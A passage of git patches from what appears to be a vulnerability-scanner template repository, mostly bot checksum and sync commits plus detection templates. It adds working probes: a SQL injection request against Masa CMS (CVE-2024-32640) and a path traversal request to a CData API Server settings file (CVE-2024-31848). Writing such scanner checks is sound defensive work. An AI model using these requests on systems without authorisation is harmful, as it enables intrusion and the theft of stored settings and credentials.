4b0a00483046022100deb3c2cb011969081041e458abc53a53013e5cb05bbe14f59c1faa72c014be17022100ba25e790d6e9b2dc420759b41b40d92f93167855db55d6862f69a8bfae5c740d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 63b98b90f5ddb733cfeb13b184aa4c4b4658fdae Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 7 May 2024 18:52:58 +0530 Subject: [PATCH 0666/1768] Update teamforge-panel.yaml --- http/exposed-panels/teamforge-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/teamforge-panel.yaml b/http/exposed-panels/teamforge-panel.yaml index d336250958..75c3210c84 100644 --- a/http/exposed-panels/teamforge-panel.yaml +++ b/http/exposed-panels/teamforge-panel.yaml @@ -1,7 +1,7 @@ id: teamforge-panel info: - name: TeamForge - Detection + name: TeamForge Panel - Detection author: lstatro severity: info description: | From c2d5ae8dacf92884966e193eb07474ee8509b3ab Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 7 May 2024 13:25:47 +0000 Subject: [PATCH 0667/1768] Auto Generated New Template Addition List [Tue May 7 13:25:46 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 0eb85c1a0d..09e6c2fe7e 100644 --- a/.new-additions +++ b/.new-additions @@ -17,6 +17,7 @@ http/cves/2023/CVE-2023-46347.yaml http/cves/2023/CVE-2023-4973.yaml http/cves/2023/CVE-2023-5003.yaml http/cves/2024/CVE-2024-0235.yaml +http/cves/2024/CVE-2024-0881.yaml http/cves/2024/CVE-2024-1183.yaml http/cves/2024/CVE-2024-22927.yaml http/cves/2024/CVE-2024-2340.yaml @@ -39,6 +40,7 @@ http/exposed-panels/cyberchef-panel.yaml http/exposed-panels/femtocell-panel.yaml http/exposed-panels/monitorr-panel.yaml http/exposed-panels/openwebui-panel.yaml +http/exposed-panels/teamforge-panel.yaml http/exposed-panels/tixeo-panel.yaml http/misconfiguration/installer/eyoucms-installer.yaml http/misconfiguration/installer/sabnzbd-installer.yaml From 9d3d7ba44c1ca77ae204ac48c642daa0aecc0d0a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 7 May 2024 13:25:50 +0000 Subject: [PATCH 0668/1768] Auto Generated Templates Checksum [Tue May 7 13:25:50 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8998bb8926..99fe683380 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3230,7 +3230,7 @@ http/cves/2024/CVE-2024-0305.yaml:f9c1488139a1e3dbd686ae698b0761ff93ec0dd8 http/cves/2024/CVE-2024-0337.yaml:a0259282bfc67ee1b2339ea3af3bd295baa59cc3 http/cves/2024/CVE-2024-0352.yaml:e324d6ccb69d2bee50aa487f5e068cc005c715d8 http/cves/2024/CVE-2024-0713.yaml:391fe60dbb13edaff0fb693b1b25fb71dcfb0241 -http/cves/2024/CVE-2024-0881.yaml:ad9b336aa816f3dafb631bf587de31347e6b60d6 +http/cves/2024/CVE-2024-0881.yaml:a827b28c2e217c38e6a44902abf23f5df53bb437 http/cves/2024/CVE-2024-1021.yaml:a48c4dce997dffd7ee3b988bc0dc646f2cf840d7 http/cves/2024/CVE-2024-1061.yaml:86d3c132707db27f265ffc55e9a5897dd6b03fd0 http/cves/2024/CVE-2024-1071.yaml:f9280444cf13a8677b365b28c1bf7cd991829d9c @@ -4392,6 +4392,7 @@ http/exposed-panels/tableau-service-manager.yaml:e4dc0c6474aa8a500910b956e054007 http/exposed-panels/tailon-panel.yaml:932dd429c4c6c0c653283e1ec18f21c33d1f658a http/exposed-panels/tautulli-panel.yaml:b1e7c47f7d30fd55e28e49a0e08a4f1f2ee075df http/exposed-panels/teamcity-login-panel.yaml:e4a0853683e0c6d7f25e8b4efa8ac9986c3efe68 +http/exposed-panels/teamforge-panel.yaml:d67b9f80b7dbc2a68def683b50fff21ea433c5f2 http/exposed-panels/teampass-panel.yaml:b20c18ab358e4afa1b363e71e60469127a91b284 http/exposed-panels/tectuus-scada-monitor.yaml:2eb28ad9aac490c62d5a0be1004874ce40bce294 http/exposed-panels/tekton-dashboard.yaml:5af9080f654df96d79406a398e81f2a7a8117224 @@ -8482,7 +8483,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:dce7b05f3958d9a6f2a0dcf95d46642fa302d498 +templates-checksum.txt:8e3735995334bd7b9879049c70c0165c0e882478 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 35ed2626e417469073a72abe40b6bcba8b140752 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 7 May 2024 18:56:16 +0530 Subject: [PATCH 0669/1768] Update https-to-http-redirect.yaml --- http/misconfiguration/https-to-http-redirect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/misconfiguration/https-to-http-redirect.yaml b/http/misconfiguration/https-to-http-redirect.yaml index 38b23aae40..b3ff8b6c71 100644 --- a/http/misconfiguration/https-to-http-redirect.yaml +++ b/http/misconfiguration/https-to-http-redirect.yaml @@ -2,7 +2,7 @@ id: https-to-http-redirect info: name: HTTPS to HTTP redirect Misconfiguration - author: kazet, idealphase + author: kazet,idealphase severity: info description: | Detects whether there is a redirect from https:// to http:// From 697ae448bdfa923268d7856ffdc0fbd41af33f25 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 7 May 2024 13:26:26 +0000 Subject: [PATCH 0670/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index f47708f6da..52631603bf 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -22,6 +22,7 @@ on: - 'http/cves/2023/CVE-2023-4973.yaml' - 'http/cves/2023/CVE-2023-5003.yaml' - 'http/cves/2024/CVE-2024-0235.yaml' + - 'http/cves/2024/CVE-2024-0881.yaml' - 'http/cves/2024/CVE-2024-1183.yaml' - 'http/cves/2024/CVE-2024-22927.yaml' - 'http/cves/2024/CVE-2024-2340.yaml' @@ -44,6 +45,7 @@ on: - 'http/exposed-panels/femtocell-panel.yaml' - 'http/exposed-panels/monitorr-panel.yaml' - 'http/exposed-panels/openwebui-panel.yaml' + - 'http/exposed-panels/teamforge-panel.yaml' - 'http/exposed-panels/tixeo-panel.yaml' - 'http/misconfiguration/installer/eyoucms-installer.yaml' - 'http/misconfiguration/installer/sabnzbd-installer.yaml' From bf53ee0d10872b80e7fed9eeff845b3425e7b933 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 7 May 2024 13:27:34 +0000 Subject: [PATCH 0671/1768] Auto Template Signing [Tue May 7 13:27:34 UTC 2024] :robot: --- http/exposed-panels/teamforge-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/teamforge-panel.yaml b/http/exposed-panels/teamforge-panel.yaml index 75c3210c84..c06f49f105 100644 --- a/http/exposed-panels/teamforge-panel.yaml +++ b/http/exposed-panels/teamforge-panel.yaml @@ -40,3 +40,4 @@ http: part: body regex: - "teamforge(\\d+)" +# digest: 4b0a00483046022100eafaf68f542e3da6a5f1b773c1feeef158b2441185e3be71c6fcb57e60093517022100ab0a381b8d93304d88deb969b7e289ce04ff71bc91173661685955160fd4dcb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 12f90d5f747b52127b35fa3c189b2eca42f418b0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 7 May 2024 19:10:46 +0530 Subject: [PATCH 0672/1768] Update weblogic-t3-detect.yaml --- network/detection/weblogic-t3-detect.yaml | 32 +++++++---------------- 1 file changed, 9 insertions(+), 23 deletions(-) diff --git a/network/detection/weblogic-t3-detect.yaml b/network/detection/weblogic-t3-detect.yaml index 8ef1dbf125..b1035ceb2a 100644 --- a/network/detection/weblogic-t3-detect.yaml +++ b/network/detection/weblogic-t3-detect.yaml @@ -6,24 +6,20 @@ info: severity: info description: | T3 is the protocol used to transport information between WebLogic servers and other types of Java programs. + impact: | + May indicate potential exposure to Weblogic T3 Protocol vulnerabilities + remediation: | + Ensure proper configuration and security measures are in place for Weblogic T3 Protocol metadata: max-request: 2 tags: network,weblogic,detect,t3,oracle + tcp: - inputs: - - data: "t3 12.2.1 - - AS:255 - - HL:19 - - MS:10000000 - - PU:t3://us-l-breens:7001 - - \n" + - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" host: - "{{Hostname}}" + port: 7001 read-size: 1024 matchers: - type: word @@ -38,20 +34,11 @@ tcp: - "HELO:(.*).false" - inputs: - - data: "t3s 12.2.1 - - AS:255 - - HL:19 - - MS:10000000 - - PU:t3://us-l-breens:7001 - - \n" + - data: "t3s 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" host: - "tls://{{Hostname}}" read-size: 1024 + port: 7002 matchers: - type: word words: @@ -63,4 +50,3 @@ tcp: group: 1 regex: - "HELO:(.*).false" -# digest: 4b0a004830460221008e4fc5512e10a4bac580826b8cb65a981a9ef61b55f63c6f892cf0dde4b500a8022100e08f41e4f5d99713ff8e920b11a1fdfa70f7b1f5f5d0a2df25aa91bf69a010df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From a51f0706f93c6857efcef4f5770aa2bad1b0a053 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Wed, 8 May 2024 01:55:35 +0530 Subject: [PATCH 0673/1768] Added CVE-2024-32640 (Mura/Masa CMS - SQL Injection) --- http/cves/2024/CVE-2024-32640.yaml | 40 ++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 http/cves/2024/CVE-2024-32640.yaml diff --git a/http/cves/2024/CVE-2024-32640.yaml b/http/cves/2024/CVE-2024-32640.yaml new file mode 100644 index 0000000000..0d74222745 --- /dev/null +++ b/http/cves/2024/CVE-2024-32640.yaml @@ -0,0 +1,40 @@ +id: CVE-2024-32640 + +info: + name: Mura/Masa CMS - SQL Injection + author: iamnoooob,rootxharsh,pdresearch + severity: critical + description: | + The Mura/Masa CMS is vulnerable to SQL Injection. + reference: + - https://blog.projectdiscovery.io/hacking-apple-with-sql-injection/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32640 + impact: | + Successful exploitation could lead to unauthorized access to sensitive data. + remediation: | + Apply the vendor-supplied patch or update to a secure version. + metadata: + verified: true + max-request: 3 + vendor: masacms + product: masacms + shodan-query: 'Generator: Masa CMS' + tags: cve,cve2022,sqli,cms,masa,masacms + +http: + - raw: + - | + POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + object=displayregion&contenthistid=x\'&previewid=1 + + matchers: + - type: dsl + dsl: + - 'status_code == 500' + - 'contains(header, "application/json")' + - 'contains_all(body, "Unhandled Exception")' + - 'contains_all(header,"cfid","cftoken")' + condition: and From 5ffa292482a7f54e74da7eab419011873e04b3b3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 8 May 2024 02:56:33 +0530 Subject: [PATCH 0674/1768] request update --- http/cves/2024/CVE-2024-32640.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-32640.yaml b/http/cves/2024/CVE-2024-32640.yaml index 0d74222745..bcc91492e8 100644 --- a/http/cves/2024/CVE-2024-32640.yaml +++ b/http/cves/2024/CVE-2024-32640.yaml @@ -6,16 +6,16 @@ info: severity: critical description: | The Mura/Masa CMS is vulnerable to SQL Injection. - reference: - - https://blog.projectdiscovery.io/hacking-apple-with-sql-injection/ - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32640 impact: | Successful exploitation could lead to unauthorized access to sensitive data. remediation: | Apply the vendor-supplied patch or update to a secure version. + reference: + - https://blog.projectdiscovery.io/hacking-apple-with-sql-injection/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32640 metadata: verified: true - max-request: 3 + max-request: 1 vendor: masacms product: masacms shodan-query: 'Generator: Masa CMS' From 8901913c29419339aa1b6bc1018eb5374b2f9f73 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 8 May 2024 05:59:24 +0530 Subject: [PATCH 0675/1768] Create CVE-2024-31848 --- http/cves/2024/CVE-2024-31848 | 39 +++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 http/cves/2024/CVE-2024-31848 diff --git a/http/cves/2024/CVE-2024-31848 b/http/cves/2024/CVE-2024-31848 new file mode 100644 index 0000000000..1c8a806de4 --- /dev/null +++ b/http/cves/2024/CVE-2024-31848 @@ -0,0 +1,39 @@ +id: CVE-2024-31848 + +info: + name: CData API Server < 23.4.8844 - Path Traversal + author: pussycat0x + severity: critical + description: | + A path traversal vulnerability exists in the Java version of CData API Server < 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31848 + - https://github.com/Stuub/CVE-2024-31848-PoC/blob/main/CVE-2024-31848.py + - https://www.tenable.com/cve/CVE-2024-31848 + - https://www.tenable.com/security/research/tra-2024-09 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-31848 + cwe-id: CWE-22 + epss-score: 0.00044 + epss-percentile: 0.09773 + tags: cve,cve2024,jetty,pathtraversal + +http: + - method: GET + path: + - "{{BaseURL}}/ui/../src/getSettings.rsb?@json" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "smtppassword" + - "nopassword" + condition: and + + - type: status + status: + - 200 From 15306ff45e1a48bd63612682e76a2ea03f7e3050 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 8 May 2024 06:09:13 +0530 Subject: [PATCH 0676/1768] Update CVE-2024-31848 --- http/cves/2024/CVE-2024-31848 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-31848 b/http/cves/2024/CVE-2024-31848 index 1c8a806de4..ef6f533875 100644 --- a/http/cves/2024/CVE-2024-31848 +++ b/http/cves/2024/CVE-2024-31848 @@ -23,7 +23,7 @@ info: http: - method: GET path: - - "{{BaseURL}}/ui/../src/getSettings.rsb?@json" + - "{{BaseURL}}/ui/..\src\getSettings.rsb?@json" matchers-condition: and matchers: From 7476bc5a52fc00addfab660df6d57617989776a2 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 8 May 2024 08:25:54 +0530 Subject: [PATCH 0677/1768] Update CVE-2024-32640.yaml --- http/cves/2024/CVE-2024-32640.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-32640.yaml b/http/cves/2024/CVE-2024-32640.yaml index bcc91492e8..c01ef1bbfe 100644 --- a/http/cves/2024/CVE-2024-32640.yaml +++ b/http/cves/2024/CVE-2024-32640.yaml @@ -19,7 +19,7 @@ info: vendor: masacms product: masacms shodan-query: 'Generator: Masa CMS' - tags: cve,cve2022,sqli,cms,masa,masacms + tags: cve,cve2024,sqli,cms,masa,masacms http: - raw: From 49682a909830bf498c1596b46bb8f7e9fd109422 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 8 May 2024 08:50:09 +0530 Subject: [PATCH 0678/1768] Rename CVE-2023-6389.yaml to CVE-2023-6389.yaml --- http/cves/2023/{ CVE-2023-6389.yaml => CVE-2023-6389.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename http/cves/2023/{ CVE-2023-6389.yaml => CVE-2023-6389.yaml} (99%) diff --git a/http/cves/2023/ CVE-2023-6389.yaml b/http/cves/2023/CVE-2023-6389.yaml similarity index 99% rename from http/cves/2023/ CVE-2023-6389.yaml rename to http/cves/2023/CVE-2023-6389.yaml index 51ae4b3056..74d9433cde 100644 --- a/http/cves/2023/ CVE-2023-6389.yaml +++ b/http/cves/2023/CVE-2023-6389.yaml @@ -35,4 +35,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$' -# digest: 4a0a00473045022100c227bbaa90d02a8b9a508a44f888cc765c6a1454560b1517de91547f856b16df022006e4ae4b398be8b002c3d5d69184bc04a8181d0019c21f8ed05cf288b73b603c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c227bbaa90d02a8b9a508a44f888cc765c6a1454560b1517de91547f856b16df022006e4ae4b398be8b002c3d5d69184bc04a8181d0019c21f8ed05cf288b73b603c:922c64590222798bb761d5b6d8e72950 From d1452fc0dbda564ecf60e5b2af9e58555f98f048 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 8 May 2024 03:25:33 +0000 Subject: [PATCH 0679/1768] Auto Generated New Template Addition List [Wed May 8 03:25:33 UTC 2024] :robot: --- .new-additions | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.new-additions b/.new-additions index 09e6c2fe7e..80490721a3 100644 --- a/.new-additions +++ b/.new-additions @@ -1,6 +1,5 @@ http/cves/2015/CVE-2015-4455.yaml http/cves/2019/CVE-2019-7139.yaml -http/cves/2023/ CVE-2023-6389.yaml http/cves/2023/CVE-2023-1892.yaml http/cves/2023/CVE-2023-2227.yaml http/cves/2023/CVE-2023-27032.yaml @@ -16,6 +15,7 @@ http/cves/2023/CVE-2023-45375.yaml http/cves/2023/CVE-2023-46347.yaml http/cves/2023/CVE-2023-4973.yaml http/cves/2023/CVE-2023-5003.yaml +http/cves/2023/CVE-2023-6389.yaml http/cves/2024/CVE-2024-0235.yaml http/cves/2024/CVE-2024-0881.yaml http/cves/2024/CVE-2024-1183.yaml From a6abe89d05dafb2ea999a4a284124826d47fbc82 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 8 May 2024 03:25:37 +0000 Subject: [PATCH 0680/1768] Auto Generated Templates Checksum [Wed May 8 03:25:37 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 99fe683380..12bff3c555 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2867,7 +2867,6 @@ http/cves/2022/CVE-2022-48012.yaml:a314bcd807127751eafd5704712ad817119d1e5d http/cves/2022/CVE-2022-48165.yaml:2924708e53089f3448ccb9e4456eab50a255e475 http/cves/2022/CVE-2022-48197.yaml:3637340a7a0a61a3a666170aa7c61cfba8420427 http/cves/2022/CVE-2022-4897.yaml:69298dfcb359adcc00a49f5df06cd3ced0c5bd9f -http/cves/2023/ CVE-2023-6389.yaml:902cb47b37fc4b41609b99c966f67bb0ac252124 http/cves/2023/CVE-2023-0099.yaml:9407e1c3bced15c82b969d23516fd90490c1aee1 http/cves/2023/CVE-2023-0126.yaml:c9dec5f824c521f0333efd2134fce5831ff3b45b http/cves/2023/CVE-2023-0159.yaml:623f9ab092c9590e7d9b3e245fe2f8b090df54f5 @@ -3214,6 +3213,7 @@ http/cves/2023/CVE-2023-6114.yaml:fb42b31775be2bbad24ddc15474b08d1d5a14341 http/cves/2023/CVE-2023-6360.yaml:02f33c56e0b2c876afb8067605ecea59372947b6 http/cves/2023/CVE-2023-6379.yaml:6ebc677324ecc29a9012474f6228f27be950dee0 http/cves/2023/CVE-2023-6380.yaml:24e6506046fab035c83ce942b572d9389c88df15 +http/cves/2023/CVE-2023-6389.yaml:a7849d4aba637c66da0d3d08b08158b6ccfcd27d http/cves/2023/CVE-2023-6553.yaml:7976983a9d94d1562386621c7528c4e1af07ee89 http/cves/2023/CVE-2023-6567.yaml:83818566ad0764aa9933b7f1905075c40b645479 http/cves/2023/CVE-2023-6623.yaml:182c33805efba63a9f987417b6e13ce81c8643e9 @@ -4392,7 +4392,7 @@ http/exposed-panels/tableau-service-manager.yaml:e4dc0c6474aa8a500910b956e054007 http/exposed-panels/tailon-panel.yaml:932dd429c4c6c0c653283e1ec18f21c33d1f658a http/exposed-panels/tautulli-panel.yaml:b1e7c47f7d30fd55e28e49a0e08a4f1f2ee075df http/exposed-panels/teamcity-login-panel.yaml:e4a0853683e0c6d7f25e8b4efa8ac9986c3efe68 -http/exposed-panels/teamforge-panel.yaml:d67b9f80b7dbc2a68def683b50fff21ea433c5f2 +http/exposed-panels/teamforge-panel.yaml:8392c4b73a322e6c548d04f0a329f5920d81fe6a http/exposed-panels/teampass-panel.yaml:b20c18ab358e4afa1b363e71e60469127a91b284 http/exposed-panels/tectuus-scada-monitor.yaml:2eb28ad9aac490c62d5a0be1004874ce40bce294 http/exposed-panels/tekton-dashboard.yaml:5af9080f654df96d79406a398e81f2a7a8117224 @@ -8483,7 +8483,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:8e3735995334bd7b9879049c70c0165c0e882478 +templates-checksum.txt:74d89bc23bdb155ab1dbf0b659402ab2259ce03e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 12e531901cb4e467415084258cc7fd6f4ded6568 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 8 May 2024 03:26:18 +0000 Subject: [PATCH 0681/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 52631603bf..7b71c4f162 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -5,7 +5,6 @@ on: - '.new-additions' - 'http/cves/2015/CVE-2015-4455.yaml' - 'http/cves/2019/CVE-2019-7139.yaml' - - 'http/cves/2023/ CVE-2023-6389.yaml' - 'http/cves/2023/CVE-2023-1892.yaml' - 'http/cves/2023/CVE-2023-2227.yaml' - 'http/cves/2023/CVE-2023-27032.yaml' @@ -21,6 +20,7 @@ on: - 'http/cves/2023/CVE-2023-46347.yaml' - 'http/cves/2023/CVE-2023-4973.yaml' - 'http/cves/2023/CVE-2023-5003.yaml' + - 'http/cves/2023/CVE-2023-6389.yaml' - 'http/cves/2024/CVE-2024-0235.yaml' - 'http/cves/2024/CVE-2024-0881.yaml' - 'http/cves/2024/CVE-2024-1183.yaml' From a94591c7f5f8dd776dec90a76f81d610265680c9 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 8 May 2024 06:01:08 +0000 Subject: [PATCH 0682/1768] Auto Generated New Template Addition List [Wed May 8 06:01:08 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 80490721a3..9dadc165f9 100644 --- a/.new-additions +++ b/.new-additions @@ -29,6 +29,7 @@ http/cves/2024/CVE-2024-3136.yaml http/cves/2024/CVE-2024-31621.yaml http/cves/2024/CVE-2024-31849.yaml http/cves/2024/CVE-2024-32399.yaml +http/cves/2024/CVE-2024-32640.yaml http/cves/2024/CVE-2024-4040.yaml http/cves/2024/CVE-2024-4348.yaml http/default-logins/crushftp/crushftp-anonymous-login.yaml From f9a069f183d59949f8669c99771dfe4472594e25 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 8 May 2024 06:01:17 +0000 Subject: [PATCH 0683/1768] Auto Generated Templates Checksum [Wed May 8 06:01:17 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 12bff3c555..ce5cc32e8b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3275,6 +3275,7 @@ http/cves/2024/CVE-2024-3136.yaml:5fed158063381326ca7336af0dc0c43ed317883d http/cves/2024/CVE-2024-31621.yaml:c018e5f982f789c5e23e7d94ff0f72baed228730 http/cves/2024/CVE-2024-31849.yaml:3da1475fe1c4acaa241663e897ab6a00caf6b49b http/cves/2024/CVE-2024-32399.yaml:313686632b5766a7b54093c4c7201abe93e487e6 +http/cves/2024/CVE-2024-32640.yaml:8860384a27158bf684d2da9680a25c88e74188f5 http/cves/2024/CVE-2024-3273.yaml:a3f9f69c4c7f4f6e45f66d06fead2fb61338db17 http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82 @@ -8483,7 +8484,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:74d89bc23bdb155ab1dbf0b659402ab2259ce03e +templates-checksum.txt:5e84eef4388bcc9bf901398a808b7b4a961a7948 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 74b9e1bf5c846fb757f677eec4bd83c33d7c1bf1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 8 May 2024 06:01:54 +0000 Subject: [PATCH 0684/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 7b71c4f162..0f5389d880 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -34,6 +34,7 @@ on: - 'http/cves/2024/CVE-2024-31621.yaml' - 'http/cves/2024/CVE-2024-31849.yaml' - 'http/cves/2024/CVE-2024-32399.yaml' + - 'http/cves/2024/CVE-2024-32640.yaml' - 'http/cves/2024/CVE-2024-4040.yaml' - 'http/cves/2024/CVE-2024-4348.yaml' - 'http/default-logins/crushftp/crushftp-anonymous-login.yaml' From 20aa979eb7ae0a008f5dcc0633d4e89f034046ca Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 8 May 2024 06:02:57 +0000 Subject: [PATCH 0685/1768] Auto Template Signing [Wed May 8 06:02:57 UTC 2024] :robot: --- http/cves/2024/CVE-2024-32640.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-32640.yaml b/http/cves/2024/CVE-2024-32640.yaml index c01ef1bbfe..3a719ded91 100644 --- a/http/cves/2024/CVE-2024-32640.yaml +++ b/http/cves/2024/CVE-2024-32640.yaml @@ -38,3 +38,4 @@ http: - 'contains_all(body, "Unhandled Exception")' - 'contains_all(header,"cfid","cftoken")' condition: and +# digest: 490a0046304402205137d62a1a156eb05abb3b8cf2e25cf11515c4d7e2f7e0180a2178ad123af0d1022076a749c27251a5412b13e303a6a6724eb2c1d40dbfe236975cd2f0f1050201dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 4a6a0b3285d7af444c4b991e342a6e2fa3279e40 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 8 May 2024 11:43:14 +0530 Subject: [PATCH 0686/1768] Update and rename CVE-2024-31848 to CVE-2024-31848.yaml --- .../{CVE-2024-31848 => CVE-2024-31848.yaml} | 34 ++++++++++++++++--- 1 file changed, 29 insertions(+), 5 deletions(-) rename http/cves/2024/{CVE-2024-31848 => CVE-2024-31848.yaml} (62%) diff --git a/http/cves/2024/CVE-2024-31848 b/http/cves/2024/CVE-2024-31848.yaml similarity index 62% rename from http/cves/2024/CVE-2024-31848 rename to http/cves/2024/CVE-2024-31848.yaml index ef6f533875..5bb9ea00c3 100644 --- a/http/cves/2024/CVE-2024-31848 +++ b/http/cves/2024/CVE-2024-31848.yaml @@ -18,21 +18,45 @@ info: cwe-id: CWE-22 epss-score: 0.00044 epss-percentile: 0.09773 - tags: cve,cve2024,jetty,pathtraversal + metadata: + verified: true + max-request: 1 + shodan-query: title:"CData - API Server" + tags: cve,cve2024,cdata,lfi + +flow: http(1) && http(2) http: - method: GET path: - - 